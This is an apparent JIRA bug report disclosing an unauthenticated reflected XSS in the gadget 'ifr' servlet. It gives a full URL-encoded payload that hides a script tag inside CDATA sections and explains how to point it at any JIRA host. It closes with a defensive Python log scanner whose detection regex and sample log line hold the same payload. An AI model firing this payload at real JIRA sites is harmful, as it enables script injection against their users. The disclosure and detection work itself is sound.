Details
- Bug
- Resolution: Fixed
- High
- 5.5.3
- 7.5
Description
Steps to recreate:
1. To view the reflected XSS affecting JIRA, present on the current JIRA installation (jira.atlassian.com), visit the following link:
https://jira.atlassian.com/plugins/servlet/gadgets/ifr?rawxml=%3C%3Fxml+version%3D%221.0%22+encoding%3D%22UTF-8%22+%3F%3E%3CModule%3E%3CModulePrefs+title%3D%22Location+Map%22+height%3D%22300%22%0D%0Aauthor%3D%22a%22+author_email%3D%22a%22+%2F%3E%3CUserPref+name%3D%22lat%22+display_name%3D%22Latitude%22+required%3D%22true%22+%2F%3E%3CUserPref+name%3D%22lng%22+display_name%3D%22Longitude%22+required%3D%22true%22+%2F%3E%3CContent+type%3D%22html%22%3E%3C![CDATA[%3C]]%3Escript%3C![CDATA[%3E]]%3Ealert%28document.domain%29%3C![CDATA[%3C]]%3E/script%3C![CDATA[%3E]]%3E%3C%2FContent%3E%3C%2FModule%3E&url=https%3A%2F%2Fjira.atlassian.com%2Frest%2Fgadgets%2F1.0%2Fg%2Fcom.atlassian.jira.gadgets%3Aintroduction-gadget%2Fgadgets%2Fintroduction-gadget.xml
2. To perform the reflected XSS attack on any JIRA installation (not sure how far back this issue dates), replace the host (jira.atlassian.com, found later in the URL) with the one you wish to test on, and append the path to the base JIRA directory.
/plugins/servlet/gadgets/ifr?rawxml=%3C%3Fxml+version%3D%221.0%22+encoding%3D%22UTF-8%22+%3F%3E%3CModule%3E%3CModulePrefs+title%3D%22Location+Map%22+height%3D%22300%22%0D%0Aauthor%3D%22a%22+author_email%3D%22a%22+%2F%3E%3CUserPref+name%3D%22lat%22+display_name%3D%22Latitude%22+required%3D%22true%22+%2F%3E%3CUserPref+name%3D%22lng%22+display_name%3D%22Longitude%22+required%3D%22true%22+%2F%3E%3CContent+type%3D%22html%22%3E%3C![CDATA[%3C]]%3Escript%3C![CDATA[%3E]]%3Ealert%28document.domain%29%3C![CDATA[%3C]]%3E/script%3C![CDATA[%3E]]%3E%3C%2FContent%3E%3C%2FModule%3E&url=https%3A%2F%2Fjira.atlassian.com%2Frest%2Fgadgets%2F1.0%2Fg%2Fcom.atlassian.jira.gadgets%3Aintroduction-gadget%2Fgadgets%2Fintroduction-gadget.xml
Note: This XSS requires no user interaction or authentication.
The original reporter of this vulnerability is Nir Goldshlager ngoldshlager@salesforce.com.
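The request above works because the `rawxml` parameter of the gadget `ifr` servlet carries a whole gadget specification, and the `<script>` tag inside its HTML `<Content>` is split across CDATA sections, so a filter that looks for `<script` in the raw parameter sees nothing. As an added example (not part of this report and not Atlassian's code), the following Python script shows how a defender could flag this pattern in web-server access logs: it isolates requests to the `/plugins/servlet/gadgets/ifr` path, decodes any `rawxml` parameter, unwraps the CDATA sections the way the gadget renderer effectively does, and only then checks for script content. The servlet path and parameter name come from the report above; the log lines, client addresses and `example.invalid` host are constructed for the example.

```python
"""Flag gadget 'ifr' requests that carry an inline gadget spec with script content.

Added example for log review; not code from the report above or from Atlassian.
"""
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample access-log lines (Common Log Format style), not real traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2017:13:55:36 +0000] "GET /plugins/servlet/gadgets/ifr?rawxml=%3C%3Fxml+version%3D%221.0%22%3F%3E%3CModule%3E%3CContent+type%3D%22html%22%3E%3C![CDATA[%3C]]%3Escript%3C![CDATA[%3E]]%3Ealert%281%29%3C![CDATA[%3C]]%3E/script%3C![CDATA[%3E]]%3E%3C%2FContent%3E%3C%2FModule%3E&url=https%3A%2F%2Fexample.invalid%2Fg.xml HTTP/1.1" 200 512
203.0.113.6 - - [10/Oct/2017:13:55:40 +0000] "GET /plugins/servlet/gadgets/ifr?url=https%3A%2F%2Fexample.invalid%2Frest%2Fgadgets%2F1.0%2Fg%2Fintro.xml HTTP/1.1" 200 2048
203.0.113.7 - - [10/Oct/2017:13:55:41 +0000] "GET /browse/TEST-1 HTTP/1.1" 200 9000
"""

# Servlet path from the report; JIRA may sit under a context path, so match on the suffix.
GADGET_IFR_PATH = "/plugins/servlet/gadgets/ifr"

# Request line inside a CLF-style log entry.
LOG_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
# CDATA section: <![CDATA[ ... ]]>
CDATA_RE = re.compile(r"<!\[CDATA\[(.*?)\]\]>", re.DOTALL)
# Script-bearing markup to look for once CDATA wrappers are gone.
SCRIPT_RE = re.compile(r"<\s*script\b|\bon\w+\s*=|javascript:", re.IGNORECASE)


def unwrap_cdata(xml_text: str) -> str:
    """Replace each CDATA section with its literal contents.

    This is the step a naive filter skips: "<![CDATA[<]]>script<![CDATA[>]]>"
    contains no "<script" until the wrappers are removed.
    """
    return CDATA_RE.sub(lambda m: m.group(1), xml_text)


def inspect_request(target: str) -> dict:
    """Classify one request target (path plus query string)."""
    parts = urlsplit(target)
    result = {"gadget_ifr": False, "inline_spec": False, "script_in_spec": False}
    if not parts.path.endswith(GADGET_IFR_PATH):
        return result
    result["gadget_ifr"] = True
    # parse_qs percent-decodes values and turns '+' into spaces.
    params = parse_qs(parts.query, keep_blank_values=True)
    raw_specs = params.get("rawxml", [])
    if not raw_specs:
        return result  # Normal gadget load by URL only; nothing inline to inspect.
    result["inline_spec"] = True
    flattened = unwrap_cdata(raw_specs[0])
    result["script_in_spec"] = bool(SCRIPT_RE.search(flattened))
    return result


def scan_log(log_text: str) -> list:
    """Return one finding per request that supplies an inline gadget spec."""
    findings = []
    for line in log_text.splitlines():
        match = LOG_RE.search(line)
        if not match:
            continue
        verdict = inspect_request(match.group("target"))
        if verdict["inline_spec"]:
            findings.append({"client": line.split()[0],
                             "target": match.group("target"), **verdict})
    return findings


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding["client"], "script_in_spec =", finding["script_in_spec"])
```

Only the first sample line is reported: it hits the gadget servlet with an inline `rawxml` spec and, after CDATA unwrapping, contains a `<script>` element. The second line loads a gadget by `url` only and is the normal case; the third never touches the servlet. In a real deployment any `rawxml` request from an unauthenticated source is worth a look regardless of the script check, since the report notes that the gadget path accepts the inline spec without authentication.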
Issue Links
- is cloned from JRACLOUD-66366: Reflected XSS affecting JIRA via Gadgets (Closed)